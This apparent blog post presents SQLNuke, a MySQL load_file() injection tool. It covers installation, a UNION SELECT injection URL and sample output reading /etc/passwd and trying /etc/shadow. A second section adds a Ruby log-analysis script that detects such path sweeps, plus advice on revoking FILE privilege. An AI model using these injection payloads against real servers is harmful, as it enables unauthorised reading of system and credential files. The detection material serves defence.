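SQLNuke: A MySQL load_file() Injection Tool
SQLNuke is a powerful yet simple MySQL load_file() injection tool.
During a SQL injection attack against MySQL, when you need to gather information about the server, the best approach that comes to mind is the load_file() function. Guessing file paths by hand takes a great deal of time, and SQLNuke makes this process quick and painless.
Dependencies: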
git
$ sudo apt-get install git-core
$ which git
/usr/bin/git
$ git --version
git version 1.7.0.4
ruby (Ubuntu)
$ sudo apt-get install ruby
SQLNuke Installation
$ git clone https://github.com/nuke99/sqlnuke.git
$ cd sqlnuke
$ ./sql.rb
Basic usage
root@hakb0x:/sqlnuke# ./sql.rb -u 'http://localhost/index.php?id=-1+UNION+SELECT+1,XxxX,3--'
[!] localhost folder already exists
[!] No OS selected, Continue with all the possibilities
[200] - [Failed] /etc/apache2/logs/access.log
[200] - [Success] /etc/hosts
[200] - [Failed] /home/apache/httpd.conf
[200] - [Failed] /usr/local/apache2/conf/httpd.conf
[200] - [Failed] /etc/apache2/vhosts.d/default_vhost.include
[200] - [Failed] /etc/apache2/apache2.conf
[200] - [Failed] /opt/apache/conf/httpd.conf
[200] - [Failed] /usr/local/apache/conf/httpd.conf
[200] - [Failed] /var/www/vhosts/sitename/httpdocs//etc/init.d/apache
[200] - [Success] /etc/passwd
[200] - [Failed] /etc/apache/apache.conf
[200] - [Failed] /etc/httpd/conf/httpd.conf
[200] - [Failed] /home/apache/conf/httpd.conf
[200] - [Failed] /etc/apache2/sites-available/default
[200] - [Failed] /etc/apache/httpd.conf
[200] - [Failed] /etc/httpd/access.log
[200] - [Failed] /etc/apache2/httpd.conf
[200] - [Failed] /etc/httpd/httpd.conf
[200] - [Failed] /etc/init.d/apache2/httpd.conf
[200] - [Failed] /etc/init.d/apache/httpd.conf
[200] - [Success] /etc/group
[200] - [Failed] C:/wamp/bin/apache/logs/access.log
[200] - [Failed] /etc/shadow
....
[+] Saved files are in 'output/localhost'
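Seen from the server side, the run above is a burst of requests that differ only in the load_file() argument. The Ruby code below is an added example, not part of SQLNuke or of the original post: it extracts load_file() targets from access-log lines and flags clients that probe several paths. The log lines are constructed, and the function names and the idea that the XxxX marker is replaced by load_file() with a hex or quoted path are assumptions.

```ruby
require 'uri'

# Constructed combined-format access-log lines, not captured from a real server.
# Assumption: the XxxX marker is replaced by load_file(0x<hex>) or load_file('<path>').
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "GET /index.php?id=-1+UNION+SELECT+1,load_file(0x2f6574632f706173737764),3-- HTTP/1.1" 200 1874
  203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "GET /index.php?id=-1+UNION+SELECT+1,LOAD_FILE(0x2f6574632f686f737473),3-- HTTP/1.1" 200 731
  203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /index.php?id=-1+UNION+SELECT+1,load_file(%27/etc/shadow%27),3-- HTTP/1.1" 200 512
  203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /index.php?id=-1+UNION+SELECT+1,load_file(0x2f6574632f67726f7570),3-- HTTP/1.1" 200 902
  198.51.100.4 - - [12/Mar/2024:10:15:03 +0000] "GET /index.php?id=5 HTTP/1.1" 200 2048
  192.0.2.9 - - [12/Mar/2024:10:16:40 +0000] "GET /index.php?id=1+AND+load_file(%2527/etc/hosts%2527)+IS+NULL HTTP/1.1" 200 512
LOG

LOG_LINE  = /\A(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*"/
LOAD_FILE = /load_file\s*\(\s*(?:0x([0-9a-f]+)|'([^']*)'|"([^"]*)")\s*\)/i

# URL-decode up to twice so double-encoded quotes (%2527) are still seen.
def decode_target(target)
  2.times do
    decoded = URI.decode_www_form_component(target)
    break if decoded == target
    target = decoded
  end
  target.scrub
rescue ArgumentError # malformed %-escape: keep what was decoded so far
  target.scrub
end

# Returns { client_ip => [distinct file paths passed to load_file()] }.
def load_file_probes(log)
  probes = Hash.new { |h, ip| h[ip] = [] }
  log.each_line do |line|
    ip, target = line.match(LOG_LINE)&.captures
    next unless target
    decode_target(target).scan(LOAD_FILE) do |hex, single, double|
      path = hex ? [hex].pack('H*').force_encoding('UTF-8').scrub : (single || double)
      probes[ip] << path unless probes[ip].include?(path)
    end
  end
  probes
end

# Clients that tried at least min_paths different files look like a path sweep.
def sweeping_clients(log, min_paths = 3)
  load_file_probes(log).select { |_ip, paths| paths.size >= min_paths }
end

sweeping_clients(SAMPLE_LOG).each { |ip, paths| puts "#{ip}: #{paths.join(', ')}" }
```

Every probe in the output above returned 200 whether or not the file was read, so alert on the request pattern rather than on the status code. LOAD_FILE() only succeeds for a database account that holds the FILE privilege and for paths allowed by secure_file_priv, so revoking FILE from the web application's database user removes what the sweep relies on.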